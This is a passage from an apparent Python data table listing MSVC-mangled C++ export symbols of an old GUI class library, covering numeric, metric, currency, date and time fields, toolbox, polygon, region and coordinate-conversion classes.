684: b'??P@YGEABVBigInt@@0@Z',
685: b'??_7CurrFmt@@6B@',
686: b'??_7CurrencyBox@@6BComboBox@@@',
687: b'??_7CurrencyBox@@6BCurrFmt@@@',
688: b'??_7CurrencyField@@6BCurrFmt@@@',
689: b'??_7CurrencyField@@6BSpinField@@@',
690: b'??_7MetFmt@@6B@',
691: b'??_7MetricBox@@6BComboBox@@@',
692: b'??_7MetricBox@@6BMetFmt@@@',
693: b'??_7MetricField@@6BMetFmt@@@',
694: b'??_7MetricField@@6BSpinField@@@',
695: b'??_7NumFmt@@6B@',
696: b'??_7NumericBox@@6BComboBox@@@',
697: b'??_7NumericBox@@6BNumFmt@@@',
698: b'??_7NumericField@@6BNumFmt@@@',
699: b'??_7NumericField@@6BSpinField@@@',
700: b'??_7SpinField@@6B@',
701: b'??_GCurrencyBox@@UAEPAXI@Z',
702: b'??_GCurrencyField@@UAEPAXI@Z',
703: b'??_GMetricBox@@UAEPAXI@Z',
704: b'??_GMetricField@@UAEPAXI@Z',
705: b'??_GNumericBox@@UAEPAXI@Z',
706: b'??_GNumericField@@UAEPAXI@Z',
707: b'??_GSpinField@@UAEPAXI@Z',
708: b'?ChangeCustomUnitText@MetFmt@@QAE?AVString@@ABV2@@Z',
709: b'?ChangeDecimalDigits@NumFmt@@QAEGG@Z',
710: b'?ChangeFirst@MetricField@@QAEJJW4FieldUnit@@@Z',
711: b'?ChangeInternational@NumFmt@@QAE?AVInternational@@ABV2@@Z',
712: b'?ChangeLast@MetricField@@QAEJJW4FieldUnit@@@Z',
713: b'?ChangeMax@MetFmt@@QAEJJW4FieldUnit@@@Z',
714: b'?ChangeMax@NumFmt@@QAEJJ@Z',
715: b'?ChangeMin@MetFmt@@QAEJJW4FieldUnit@@@Z',
716: b'?ChangeMin@NumFmt@@QAEJJ@Z',
717: b'?ChangeStrictFormat@NumFmt@@QAEEE@Z',
718: b'?ChangeUnit@MetFmt@@QAE?AW4FieldUnit@@W42@@Z',
719: b'?ConvertToFraction@NumFmt@@QAE?AVFraction@@J@Z',
720: b'?ConvertToLong@NumFmt@@QAEJABVFraction@@@Z',
721: b'?CustomConvert@MetricBox@@UAEXXZ',
722: b'?CustomConvert@MetricField@@UAEXXZ',
723: b'?Denormalize@NumFmt@@QBEJJ@Z',
724: b'?Disable@SpinField@@QAEXXZ',
725: b'?Down@CurrencyField@@UAEXXZ',
726: b'?Down@MetricField@@UAEXXZ',
727: b'?Down@NumericField@@UAEXXZ',
728: b'?Down@SpinField@@UAEXXZ',
729: b'?Enable@SpinField@@QAEXXZ',
730: b'?First@CurrencyField@@UAEXXZ',
731: b'?First@MetricField@@UAEXXZ',
732: b'?First@NumericField@@UAEXXZ',
733: b'?First@SpinField@@UAEXXZ',
734: b'?GetCharCode@KeyEvent@@QBEDXZ',
735: b'?GetCurrDigits@CountryTable@@QBEGXZ',
736: b'?GetCurrDigits@International@@QBEGXZ',
737: b'?GetCurrNegativeFormat@CountryTable@@QBEGXZ',
738: b'?GetCurrNegativeFormat@International@@QBEGXZ',
739: b'?GetFirst@MetricField@@QBEJW4FieldUnit@@@Z',
740: b'?GetFocus@CurrencyBox@@UAEXXZ',
741: b'?GetFocus@CurrencyField@@UAEXXZ',
742: b'?GetFocus@MetricBox@@UAEXXZ',
743: b'?GetFocus@MetricField@@UAEXXZ',
744: b'?GetFocus@NumericBox@@UAEXXZ',
745: b'?GetFocus@NumericField@@UAEXXZ',
746: b'?GetFocus@SpinField@@UAEXXZ',
747: b'?GetGroup@KeyCode@@QBEGXZ',
748: b'?GetLast@MetricField@@QBEJW4FieldUnit@@@Z',
749: b'?GetLong@ResMgr@@SGJPAX@Z',
750: b'?GetLongRes@Resource@@SGJPAX@Z',
751: b'?GetMax@MetFmt@@QBEJW4FieldUnit@@@Z',
752: b'?GetMax@NumFmt@@QBEJXZ',
753: b'?GetMin@MetFmt@@QBEJW4FieldUnit@@@Z',
754: b'?GetMin@NumFmt@@QBEJXZ',
755: b'?GetModifier@KeyCode@@QBEGXZ',
756: b'?GetNumDecimalSep@CountryTable@@QBEDXZ',
757: b'?GetNumDecimalSep@International@@QBEDXZ',
758: b'?GetNumDigits@CountryTable@@QBEGXZ',
759: b'?GetNumDigits@International@@QBEGXZ',
760: b'?GetNumThousandSep@CountryTable@@QBEDXZ',
761: b'?GetNumThousandSep@International@@QBEDXZ',
762: b'?GetValue@CurrFmt@@QBEJXZ',
763: b'?GetValue@CurrencyBox@@QBEJG@Z',
764: b'?GetValue@MetFmt@@QBEJW4FieldUnit@@@Z',
765: b'?GetValue@MetricBox@@QBEJGW4FieldUnit@@@Z',
766: b'?GetValue@NumFmt@@QBEJXZ',
767: b'?GetValue@NumericBox@@QBEJG@Z',
768: b'?GetValuePos@CurrencyBox@@QBEGJ@Z',
769: b'?GetValuePos@MetricBox@@QBEGJW4FieldUnit@@@Z',
770: b'?GetValuePos@NumericBox@@QBEGJ@Z',
771: b'?InsertValue@CurrencyBox@@QAEXJG@Z',
772: b'?InsertValue@MetricBox@@QAEXJW4FieldUnit@@G@Z',
773: b'?InsertValue@NumericBox@@QAEXJG@Z',
774: b'?IsNumThousandSep@CountryTable@@QBEEXZ',
775: b'?IsNumThousandSep@International@@QBEEXZ',
776: b'?IsValueModified@NumFmt@@QBEEXZ',
777: b'?Justify@Selection@@QAEXXZ',
778: b'?KeyInput@CurrencyBox@@UAEXABVKeyEvent@@@Z',
779: b'?KeyInput@CurrencyField@@UAEXABVKeyEvent@@@Z',
780: b'?KeyInput@MetricBox@@UAEXABVKeyEvent@@@Z',
781: b'?KeyInput@MetricField@@UAEXABVKeyEvent@@@Z',
782: b'?KeyInput@NumericBox@@UAEXABVKeyEvent@@@Z',
783: b'?KeyInput@NumericField@@UAEXABVKeyEvent@@@Z',
784: b'?KeyInput@SpinField@@UAEXABVKeyEvent@@@Z',
785: b'?Last@CurrencyField@@UAEXXZ',
786: b'?Last@MetricField@@UAEXXZ',
787: b'?Last@NumericField@@UAEXXZ',
788: b'?Last@SpinField@@UAEXXZ',
789: b'?Len@Selection@@QBEFXZ',
790: b'?LoseFocus@CurrencyBox@@UAEXXZ',
791: b'?LoseFocus@CurrencyField@@UAEXXZ',
792: b'?LoseFocus@MetricBox@@UAEXXZ',
793: b'?LoseFocus@MetricField@@UAEXXZ',
794: b'?LoseFocus@NumericBox@@UAEXXZ',
795: b'?LoseFocus@NumericField@@UAEXXZ',
796: b'?LoseFocus@SpinField@@UAEXXZ',
797: b'?Modify@CurrencyBox@@UAEXXZ',
798: b'?Modify@CurrencyField@@UAEXXZ',
799: b'?Modify@MetricBox@@UAEXXZ',
800: b'?Modify@MetricField@@UAEXXZ',
801: b'?Modify@NumericBox@@UAEXXZ',
802: b'?Modify@NumericField@@UAEXXZ',
803: b'?Modify@SpinField@@UAEXXZ',
804: b'?MouseButtonDown@SpinField@@UAEXABVMouseEvent@@@Z',
805: b'?MouseButtonUp@SpinField@@UAEXABVMouseEvent@@@Z',
806: b'?MouseMove@SpinField@@UAEXABVMouseEvent@@@Z',
807: b'?Normalize@NumFmt@@QBEJJ@Z',
808: b'?Paint@SpinField@@UAEXABVRectangle@@@Z',
809: b'?Reformat@CurrFmt@@UAEXXZ',
810: b'?Reformat@MetFmt@@UAEXXZ',
811: b'?Reformat@NumFmt@@UAEXXZ',
812: b'?ReformatAll@CurrencyBox@@UAEXXZ',
813: b'?ReformatAll@MetricBox@@UAEXXZ',
814: b'?ReformatAll@NumFmt@@UAEXXZ',
815: b'?ReformatAll@NumericBox@@UAEXXZ',
816: b'?RemoveValue@CurrencyBox@@QAEXJ@Z',
817: b'?RemoveValue@MetricBox@@QAEXJW4FieldUnit@@@Z',
818: b'?RemoveValue@NumericBox@@QAEXJ@Z',
819: b'?Resize@SpinField@@UAEXXZ',
820: b'?SetValue@CurrFmt@@QAEXJ@Z',
821: b'?SetValue@MetFmt@@QAEXJW4FieldUnit@@@Z',
822: b'?SetValue@NumFmt@@QAEXJ@Z',
823: b'?Timeout@SpinField@@QAEXPAVTimer@@@Z',
824: b'?Up@CurrencyField@@UAEXXZ',
825: b'?Up@MetricField@@UAEXXZ',
826: b'?Up@NumericField@@UAEXXZ',
827: b'?Up@SpinField@@UAEXXZ',
828: b'??0Date@@QAE@ABV0@@Z',
829: b'??0Date@@QAE@GGG@Z',
830: b'??0DateBox@@QAE@PAVWindow@@ABVResId@@@Z',
831: b'??0DateBox@@QAE@PAVWindow@@G@Z',
832: b'??0DateField@@QAE@PAVWindow@@ABVResId@@@Z',
833: b'??0DateField@@QAE@PAVWindow@@G@Z',
834: b'??0DateFmt@@QAE@ABVResId@@@Z',
835: b'??0DateFmt@@QAE@XZ',
836: b'??0PatFmt@@QAE@ABVResId@@@Z',
837: b'??0PatFmt@@QAE@XZ',
838: b'??0PatternBox@@QAE@PAVWindow@@ABVResId@@@Z',
839: b'??0PatternBox@@QAE@PAVWindow@@G@Z',
840: b'??0PatternField@@QAE@PAVWindow@@ABVResId@@@Z',
841: b'??0PatternField@@QAE@PAVWindow@@G@Z',
842: b'??0Selection@@QAE@ABV0@@Z',
843: b'??0Selection@@QAE@F@Z',
844: b'??0Time@@QAE@ABV0@@Z',
845: b'??0TimeBox@@QAE@PAVWindow@@ABVResId@@@Z',
846: b'??0TimeBox@@QAE@PAVWindow@@G@Z',
847: b'??0TimeField@@QAE@PAVWindow@@ABVResId@@@Z',
848: b'??0TimeField@@QAE@PAVWindow@@G@Z',
849: b'??0TimeFmt@@QAE@ABVResId@@@Z',
850: b'??0TimeFmt@@QAE@XZ',
851: b'??1DateBox@@UAE@XZ',
852: b'??1DateField@@UAE@XZ',
853: b'??1DateFmt@@QAE@XZ',
854: b'??1PatFmt@@QAE@XZ',
855: b'??1PatternBox@@UAE@XZ',
856: b'??1PatternField@@UAE@XZ',
857: b'??1TimeBox@@UAE@XZ',
858: b'??1TimeField@@UAE@XZ',
859: b'??1TimeFmt@@QAE@XZ',
860: b'??4Date@@QAEAAV0@ABV0@@Z',
861: b'??4Time@@QAEAAV0@ABV0@@Z',
862: b'??8@YGEABVDate@@0@Z',
863: b'??8@YGEABVTime@@0@Z',
864: b'??9@YGEABVDate@@0@Z',
865: b'??9@YGEABVTime@@0@Z',
866: b'??BString@@QBEDXZ',
867: b'??GTime@@QBE?AV0@XZ',
868: b'??M@YGEABVDate@@0@Z',
869: b'??M@YGEABVTime@@0@Z',
870: b'??O@YGEABVDate@@0@Z',
871: b'??O@YGEABVTime@@0@Z',
872: b'??_7DateBox@@6BComboBox@@@',
873: b'??_7DateBox@@6BDateFmt@@@',
874: b'??_7DateField@@6BDateFmt@@@',
875: b'??_7DateField@@6BSpinField@@@',
876: b'??_7DateFmt@@6B@',
877: b'??_7PatFmt@@6B@',
878: b'??_7PatternBox@@6BComboBox@@@',
879: b'??_7PatternBox@@6BPatFmt@@@',
880: b'??_7PatternField@@6BPatFmt@@@',
881: b'??_7PatternField@@6BSpinField@@@',
882: b'??_7TimeBox@@6BComboBox@@@',
883: b'??_7TimeBox@@6BTimeFmt@@@',
884: b'??_7TimeField@@6BSpinField@@@',
885: b'??_7TimeField@@6BTimeFmt@@@',
886: b'??_7TimeFmt@@6B@',
887: b'??_GDateBox@@UAEPAXI@Z',
888: b'??_GDateField@@UAEPAXI@Z',
889: b'??_GPatternBox@@UAEPAXI@Z',
890: b'??_GPatternField@@UAEPAXI@Z',
891: b'??_GTimeBox@@UAEPAXI@Z',
892: b'??_GTimeField@@UAEPAXI@Z',
893: b'?ChangeDuration@TimeFmt@@QAEEE@Z',
894: b'?ChangeFormat@TimeFmt@@QAE?AW4TimeFieldFormat@@W42@@Z',
895: b'?ChangeInternational@DateFmt@@QAE?AVInternational@@ABV2@@Z',
896: b'?ChangeInternational@TimeFmt@@QAE?AVInternational@@ABV2@@Z',
897: b'?ChangeLongFormat@DateFmt@@QAEEE@Z',
898: b'?ChangeMax@DateFmt@@QAE?AVDate@@ABV2@@Z',
899: b'?ChangeMax@TimeFmt@@QAE?AVTime@@ABV2@@Z',
900: b'?ChangeMin@DateFmt@@QAE?AVDate@@ABV2@@Z',
901: b'?ChangeMin@TimeFmt@@QAE?AVTime@@ABV2@@Z',
902: b'?ChangeStrictFormat@DateFmt@@QAEEE@Z',
903: b'?ChangeStrictFormat@PatFmt@@QAEEE@Z',
904: b'?ChangeStrictFormat@TimeFmt@@QAEEE@Z',
905: b'?Down@DateField@@UAEXXZ',
906: b'?Down@TimeField@@UAEXXZ',
907: b'?First@DateField@@UAEXXZ',
908: b'?First@TimeField@@UAEXXZ',
909: b'?GetDate@DateBox@@QBE?AVDate@@G@Z',
910: b'?GetDate@DateFmt@@QBE?AVDate@@XZ',
911: b'?GetDateFormat@CountryTable@@QBE?AW4DateFormat@@XZ',
912: b'?GetDateFormat@International@@QBE?AW4DateFormat@@XZ',
913: b'?GetDatePos@DateBox@@QBEGABVDate@@@Z',
914: b'?GetDateSep@CountryTable@@QBEDXZ',
915: b'?GetDateSep@International@@QBEDXZ',
916: b'?GetDay@Date@@QBEGXZ',
917: b'?GetFocus@DateBox@@UAEXXZ',
918: b'?GetFocus@DateField@@UAEXXZ',
919: b'?GetFocus@PatternBox@@UAEXXZ',
920: b'?GetFocus@PatternField@@UAEXXZ',
921: b'?GetFocus@TimeBox@@UAEXXZ',
922: b'?GetFocus@TimeField@@UAEXXZ',
923: b'?GetLongDateFormat@CountryTable@@QBE?AW4DateFormat@@XZ',
924: b'?GetLongDateFormat@International@@QBE?AW4DateFormat@@XZ',
925: b'?GetMonth@Date@@QBEGXZ',
926: b'?GetMonthText@International@@QBEABVString@@G@Z',
927: b'?GetMonthText@LanguageTable@@QBEABVString@@G@Z',
928: b'?GetString@PatFmt@@QBE?AVString@@XZ',
929: b'?GetString@PatternBox@@QBE?AVString@@G@Z',
930: b'?GetStringPos@PatternBox@@QBEGABVString@@@Z',
931: b'?GetTime100SecSep@CountryTable@@QBEDXZ',
932: b'?GetTime100SecSep@International@@QBEDXZ',
933: b'?GetTime@TimeBox@@QBE?AVTime@@G@Z',
934: b'?GetTime@TimeFmt@@QBE?AVTime@@XZ',
935: b'?GetTimeAM@CountryTable@@QBEABVString@@XZ',
936: b'?GetTimeAM@International@@QBEABVString@@XZ',
937: b'?GetTimePM@CountryTable@@QBEABVString@@XZ',
938: b'?GetTimePM@International@@QBEABVString@@XZ',
939: b'?GetTimePos@TimeBox@@QBEGABVTime@@@Z',
940: b'?GetTimeSep@CountryTable@@QBEDXZ',
941: b'?GetTimeSep@International@@QBEDXZ',
942: b'?GetYear@Date@@QBEGXZ',
943: b'?InsertDate@DateBox@@QAEXABVDate@@G@Z',
944: b'?InsertString@PatternBox@@QAEXABVString@@G@Z',
945: b'?InsertTime@TimeBox@@QAEXABVTime@@G@Z',
946: b'?IsDateCentury@CountryTable@@QBEEXZ',
947: b'?IsDateCentury@International@@QBEEXZ',
948: b'?IsDateModified@DateFmt@@QBEEXZ',
949: b'?IsLongDateCentury@CountryTable@@QBEEXZ',
950: b'?IsLongDateCentury@International@@QBEEXZ',
951: b'?IsMod2@KeyCode@@QBEEXZ',
952: b'?IsStringModified@PatFmt@@QBEEXZ',
953: b'?IsTimeModified@TimeFmt@@QBEEXZ',
954: b'?KeyInput@DateBox@@UAEXABVKeyEvent@@@Z',
955: b'?KeyInput@DateField@@UAEXABVKeyEvent@@@Z',
956: b'?KeyInput@PatternBox@@UAEXABVKeyEvent@@@Z',
957: b'?KeyInput@PatternField@@UAEXABVKeyEvent@@@Z',
958: b'?KeyInput@TimeBox@@UAEXABVKeyEvent@@@Z',
959: b'?KeyInput@TimeField@@UAEXABVKeyEvent@@@Z',
960: b'?Last@DateField@@UAEXXZ',
961: b'?Last@TimeField@@UAEXXZ',
962: b'?LoseFocus@DateBox@@UAEXXZ',
963: b'?LoseFocus@DateField@@UAEXXZ',
964: b'?LoseFocus@PatternBox@@UAEXXZ',
965: b'?LoseFocus@PatternField@@UAEXXZ',
966: b'?LoseFocus@TimeBox@@UAEXXZ',
967: b'?LoseFocus@TimeField@@UAEXXZ',
968: b'?Min@Selection@@QAEAAFXZ',
969: b'?Min@Selection@@QBEFXZ',
970: b'?Modify@DateBox@@UAEXXZ',
971: b'?Modify@DateField@@UAEXXZ',
972: b'?Modify@PatternBox@@UAEXXZ',
973: b'?Modify@PatternField@@UAEXXZ',
974: b'?Modify@TimeBox@@UAEXXZ',
975: b'?Modify@TimeField@@UAEXXZ',
976: b'?Reformat@DateFmt@@UAEXXZ',
977: b'?Reformat@PatFmt@@UAEXXZ',
978: b'?Reformat@TimeFmt@@UAEXXZ',
979: b'?ReformatAll@DateBox@@UAEXXZ',
980: b'?ReformatAll@DateFmt@@UAEXXZ',
981: b'?ReformatAll@PatFmt@@UAEXXZ',
982: b'?ReformatAll@PatternBox@@UAEXXZ',
983: b'?ReformatAll@TimeBox@@UAEXXZ',
984: b'?ReformatAll@TimeFmt@@UAEXXZ',
985: b'?RemoveDate@DateBox@@QAEXABVDate@@@Z',
986: b'?RemoveString@PatternBox@@QAEXABVString@@@Z',
987: b'?RemoveTime@TimeBox@@QAEXABVTime@@@Z',
988: b'?SetDate@DateFmt@@QAEXABVDate@@@Z',
989: b'?SetMask@PatFmt@@QAEXABVString@@0@Z',
990: b'?SetString@PatFmt@@QAEXABVString@@@Z',
991: b'?SetTime@TimeFmt@@QAEXABVTime@@@Z',
992: b'?Up@DateField@@UAEXXZ',
993: b'?Up@TimeField@@UAEXXZ',
994: b'??0List@@QAE@GGG@Z',
995: b'??0MoreButton@@QAE@PAVWindow@@ABVResId@@@Z',
996: b'??0MoreButton@@QAE@PAVWindow@@G@Z',
997: b'??0MoreWindowList@@QAE@GGG@Z',
998: b'??1MoreButton@@UAE@XZ',
999: b'??1MoreWindowList@@QAE@XZ',
1000: b'??1PushButton@@UAE@XZ',
1001: b'??_7MoreButton@@6B@',
1002: b'??_GMoreButton@@UAEPAXI@Z',
1003: b'??_GMoreWindowList@@QAEPAXI@Z',
1004: b'?AddWindow@MoreButton@@QAEXPAVWindow@@@Z',
1005: b'?ChangeDelta@MoreButton@@QAEGG@Z',
1006: b'?ChangeMapUnit@MoreButton@@QAE?AW4MapUnit@@W42@@Z',
1007: b'?ChangeState@MoreButton@@QAEEE@Z',
1008: b'?Click@MoreButton@@UAEXXZ',
1009: b'?First@MoreWindowList@@QAEPAVWindow@@XZ',
1010: b'?GetText@MoreButton@@QBE?AVString@@XZ',
1011: b'?InitMoreButton@@YGXPAVMoreButton@@@Z',
1012: b'?Insert@MoreWindowList@@QAEXPAVWindow@@K@Z',
1013: b'?Next@MoreWindowList@@QAEPAVWindow@@XZ',
1014: b'?Remove@MoreWindowList@@QAEPAVWindow@@PAV2@@Z',
1015: b'?RemoveWindow@MoreButton@@QAEXPAVWindow@@@Z',
1016: b'?SetText@MoreButton@@QAEXABVString@@@Z',
1017: b'??0ApplicationEvent@@QAE@ABVString@@000@Z',
1018: b'??0DropEvent@@QAE@ABVPoint@@W4DropAction@@E@Z',
1019: b'??0DropEvent@@QAE@XZ',
1020: b'??0PolyPolygon@@QAE@ABV0@@Z',
1021: b'??0PolyPolygon@@QAE@ABVPolygon@@@Z',
1022: b'??0PolyPolygon@@QAE@GG@Z',
1023: b'??0PolyPolygon@@QAE@GQAGQAVPoint@@@Z',
1024: b'??0Polygon@@QAE@ABV0@@Z',
1025: b'??0Polygon@@QAE@ABVRectangle@@@Z',
1026: b'??0Polygon@@QAE@G@Z',
1027: b'??0Polygon@@QAE@GQAVPoint@@@Z',
1028: b'??1PolyPolygon@@QAE@XZ',
1029: b'??1Polygon@@QAE@XZ',
1030: b'??4PolyPolygon@@QAEAAV0@ABV0@@Z',
1031: b'??4Polygon@@QAEAAV0@ABV0@@Z',
1032: b'??8PolyPolygon@@QBEEABV0@@Z',
1033: b'??8Polygon@@QBEEABV0@@Z',
1034: b'??9PolyPolygon@@QBEEABV0@@Z',
1035: b'??9Polygon@@QBEEABV0@@Z',
1036: b'??APolygon@@QAEAAVPoint@@G@Z',
1037: b'??APolygon@@QBE?AVPoint@@G@Z',
1038: b'??_GPolygon@@QAEPAXI@Z',
1039: b'?ChangePoint@Polygon@@QAE?AVPoint@@ABV2@G@Z',
1040: b'?ChangeSize@Polygon@@QAEGG@Z',
1041: b'?Clear@PolyPolygon@@QAEXXZ',
1042: b'?Clear@Polygon@@QAEXXZ',
1043: b'?Count@PolyPolygon@@QBEGXZ',
1044: b'?GetObject@PolyPolygon@@QBE?AVPolygon@@G@Z',
1045: b'?GetPoint@Polygon@@QBE?AVPoint@@G@Z',
1046: b'?GetSize@Container@@QBEKXZ',
1047: b'?GetSize@Polygon@@QBEGXZ',
1048: b'?Insert@PolyPolygon@@QAEXABVPolygon@@G@Z',
1049: b'?IsEmpty@Rectangle@@QBEEXZ',
1050: b'?Remove@PolyPolygon@@QAE?AVPolygon@@G@Z',
1051: b'?Replace@PolyPolygon@@QAE?AVPolygon@@ABV2@G@Z',
1052: b'??0Region@@QAE@ABV0@@Z',
1053: b'??0Region@@QAE@ABVPolyPolygon@@@Z',
1054: b'??0Region@@QAE@ABVPolygon@@@Z',
1055: b'??0Region@@QAE@ABVRectangle@@@Z',
1056: b'??0Region@@QAE@XZ',
1057: b'??1Region@@QAE@XZ',
1058: b'??4Region@@QAEAAV0@ABV0@@Z',
1059: b'??8Rectangle@@QBEEABV0@@Z',
1060: b'??8Region@@QBEEABV0@@Z',
1061: b'??9Region@@QBEEABV0@@Z',
1062: b'??_GPolyPolygon@@QAEPAXI@Z',
1063: b'?GetBoundRect@Region@@QBE?AVRectangle@@XZ',
1064: b'?GetType@Region@@QBE?AW4RegionType@@XZ',
1065: b'?Intersect@Region@@QAEXABVRectangle@@@Z',
1066: b'?IsEmpty@Region@@QBEEXZ',
1067: b'?Move@Region@@QAEXFF@Z',
1068: b'?DebugPrintMsgBox@@YGXPBD@Z',
1069: b'?DebugPrintShell@@YGXPBD@Z',
1070: b'?DebugPrintWindow@@YGXPBD@Z',
1071: b'??0BigInt@@QAE@F@Z',
1072: b'??0LPair@@QAE@ABV0@@Z',
1073: b'??0LPair@@QAE@JJ@Z',
1074: b'??0LPair@@QAE@XZ',
1075: b'??0LPoint@@QAE@ABV0@@Z',
1076: b'??0LPoint@@QAE@JJ@Z',
1077: b'??0LPoint@@QAE@XZ',
1078: b'?Abs@@YGFF@Z',
1079: b'?Abs@@YGJJ@Z',
1080: b'?ChangeMapMode@OutputDevice@@QAE?AVMapMode@@ABV2@@Z',
1081: b'?GetMapUnit@MapMode@@QBE?AW4MapUnit@@XZ',
1082: b'?IsNeg@BigInt@@QBEEXZ',
1083: b'?LogicToPixel@OutputDevice@@QBE?AVPoint@@ABV2@@Z',
1084: b'?LogicToPixel@OutputDevice@@QBE?AVPoint@@ABV2@ABVMapMode@@@Z',
1085: b'?LogicToPixel@OutputDevice@@QBE?AVPolyPolygon@@ABV2@@Z',
1086: b'?LogicToPixel@OutputDevice@@QBE?AVPolyPolygon@@ABV2@ABVMapMode@@@Z',
1087: b'?LogicToPixel@OutputDevice@@QBE?AVPolygon@@ABV2@@Z',
1088: b'?LogicToPixel@OutputDevice@@QBE?AVPolygon@@ABV2@ABVMapMode@@@Z',
1089: b'?LogicToPixel@OutputDevice@@QBE?AVRectangle@@ABV2@@Z',
1090: b'?LogicToPixel@OutputDevice@@QBE?AVRectangle@@ABV2@ABVMapMode@@@Z',
1091: b'?LogicToPixel@OutputDevice@@QBE?AVRegion@@ABV2@@Z',
1092: b'?LogicToPixel@OutputDevice@@QBE?AVRegion@@ABV2@ABVMapMode@@@Z',
1093: b'?LogicToPixel@OutputDevice@@QBE?AVSize@@ABV2@@Z',
1094: b'?LogicToPixel@OutputDevice@@QBE?AVSize@@ABV2@ABVMapMode@@@Z',
1095: b'?LongLogicToPixel@@YG?AVLPoint@@PAVOutputDevice@@ABV1@@Z',
1096: b'?LongPixelToLogic@@YG?AVLPoint@@PAVOutputDevice@@ABV1@@Z',
1097: b'?PixelToLogic@OutputDevice@@QBE?AVPoint@@ABV2@@Z',
1098: b'?PixelToLogic@OutputDevice@@QBE?AVPoint@@ABV2@ABVMapMode@@@Z',
1099: b'?PixelToLogic@OutputDevice@@QBE?AVPolyPolygon@@ABV2@@Z',
1100: b'?PixelToLogic@OutputDevice@@QBE?AVPolyPolygon@@ABV2@ABVMapMode@@@Z',
1101: b'?PixelToLogic@OutputDevice@@QBE?AVPolygon@@ABV2@@Z',
1102: b'?PixelToLogic@OutputDevice@@QBE?AVPolygon@@ABV2@ABVMapMode@@@Z',
1103: b'?PixelToLogic@OutputDevice@@QBE?AVRectangle@@ABV2@@Z',
1104: b'?PixelToLogic@OutputDevice@@QBE?AVRectangle@@ABV2@ABVMapMode@@@Z',
1105: b'?PixelToLogic@OutputDevice@@QBE?AVRegion@@ABV2@@Z',
1106: b'?PixelToLogic@OutputDevice@@QBE?AVRegion@@ABV2@ABVMapMode@@@Z',
1107: b'?PixelToLogic@OutputDevice@@QBE?AVSize@@ABV2@@Z',
1108: b'?PixelToLogic@OutputDevice@@QBE?AVSize@@ABV2@ABVMapMode@@@Z',
1109: b'?X@LPoint@@QAEAAJXZ',
1110: b'?X@LPoint@@QBEJXZ',
1111: b'?Y@LPoint@@QAEAAJXZ',
1112: b'?Y@LPoint@@QBEJXZ',
1113: b'??0Color@@QAE@GGG@Z',
1114: b'??0ToolBox@@QAE@PAVWindow@@ABVResId@@@Z',
1115: b'??0ToolBox@@QAE@PAVWindow@@G@Z',
1116: b'??0ToolFormatList@@QAE@XZ',
1117: b'??0ToolItem@@QAE@ABU0@@Z',
1118: b'??0ToolItem@@QAE@XZ',
1119: b'??0ToolItemList@@QAE@GG@Z',
1120: b'??1ToolBox@@UAE@XZ',
1121: b'??1ToolFormatList@@QAE@XZ',
1122: b'??1ToolItem@@QAE@XZ',
1123: b'??1ToolItemList@@QAE@XZ',
1124: b'??_7ToolBox@@6B@',
1125: b'??_GToolBox@@UAEPAXI@Z',
1126: b'??_GToolFormatList@@QAEPAXI@Z',
1127: b'??_GToolItem@@QAEPAXI@Z',
1128: b'??_GToolItemList@@QAEPAXI@Z',
1129: b'?Activate@ToolBox@@UAEXXZ',
1130: b'?Add@ToolFormatList@@QAEXG@Z',
1131: b'?CalcWindowSizePixel@ToolBox@@QBE?AVSize@@XZ',
1132: b'?ChangeAlign@ToolBox@@QAE?AW4ToolBoxAlign@@W42@@Z',
1133: b'?ChangeButtonType@ToolBox@@QAE?AW4ButtonType@@W42@@Z',
1134: b'?ChangeHelpId@ToolBox@@QAEKGK@Z',
1135: b'?ChangeLineCount@ToolBox@@QAEGG@Z',
1136: b'?CheckItem@ToolBox@@QAEXGE@Z',
1137: b'?Clear@ToolBox@@QAEXXZ',
1138: b'?Clear@ToolItemList@@QAEXXZ',
1139: b'?Click@ToolBox@@UAEXXZ',
1140: b'?CopyItems@ToolBox@@QAEXABV1@@Z',
1141: b'?Count@ToolItemList@@QBEKXZ',
1142: b'?Deactivate@ToolBox@@UAEXXZ',
1143: b'?Disable@ToolBox@@QAEXXZ',
1144: b'?DoubleClick@ToolBox@@UAEXXZ',
1145: b'?Enable@ToolBox@@QAEXXZ',
1146: b'?EnableItem@ToolBox@@QAEXGE@Z',
1147: b'?EndSelection@ToolBox@@QAEXXZ',
1148: b'?First@ToolItemList@@QAEPAUToolItem@@XZ',
1149: b'?Get@ToolFormatList@@QBEGG@Z',
1150: b'?GetClicks@MouseEvent@@QBEGXZ',
1151: b'?GetCurPos@ToolItemList@@QBEKXZ',
1152: b'?GetHelpId@ToolBox@@QBEKG@Z',
1153: b'?GetHelpText@ToolBox@@QBE?AVString@@G@Z',
1154: b'?GetItemBitmap@ToolBox@@QBE?AVBitmap@@G@Z',
1155: b'?GetItemCount@ToolBox@@QBEGXZ',
1156: b'?GetItemDisableBitmap@ToolBox@@QBE?AVBitmap@@G@Z',
1157: b'?GetItemId@ToolBox@@QBEGABVPoint@@@Z',
1158: b'?GetItemId@ToolBox@@QBEGG@Z',
1159: b'?GetItemPos@ToolBox@@QBEGG@Z',
1160: b'?GetItemRect@ToolBox@@QBE?AVRectangle@@G@Z',
1161: b'?GetItemText@ToolBox@@QBE?AVString@@G@Z',
1162: b'?GetItemType@ToolBox@@QBE?AW4ToolBoxItemType@@G@Z',
1163: b'?GetMode@HelpEvent@@QBE?AW4HelpMode@@XZ',
1164: b'?GetMousePosPixel@HelpEvent@@QBEABVPoint@@XZ',
1165: b'?GetObject@ToolItemList@@QBEPAUToolItem@@K@Z',
1166: b'?Highlight@ToolBox@@UAEXXZ',
1167: b'?Insert@ToolItemList@@QAEXPAUToolItem@@K@Z',
1168: b'?InsertBreak@ToolBox@@QAEXG@Z',
1169: b'?InsertItem@ToolBox@@QAEEABVResId@@G@Z',
1170: b'?InsertItem@ToolBox@@QAEEGABVBitmap@@0ABVString@@G@Z',
1171: b'?InsertItem@ToolBox@@QAEEGABVBitmap@@0G@Z',
1172: b'?InsertItem@ToolBox@@QAEEGABVBitmap@@ABVString@@G@Z',
1173: b'?InsertItem@ToolBox@@QAEEGABVBitmap@@G@Z',
1174: b'?InsertItem@ToolBox@@QAEEGABVString@@G@Z',
1175: b'?InsertSeparator@ToolBox@@QAEXG@Z',
1176: b'?InsertSpace@ToolBox@@QAEXG@Z',
1177: b'?IsItemChecked@ToolBox@@QBEEG@Z',
1178: b'?IsItemEnabled@ToolBox@@QBEEG@Z',
1179: b'?MouseButtonDown@ToolBox@@UAEXABVMouseEvent@@@Z',
1180: b'?MouseButtonUp@ToolBox@@UAEXABVMouseEvent@@@Z',
1181: b'?MouseMove@ToolBox@@UAEXABVMouseEvent@@@Z',
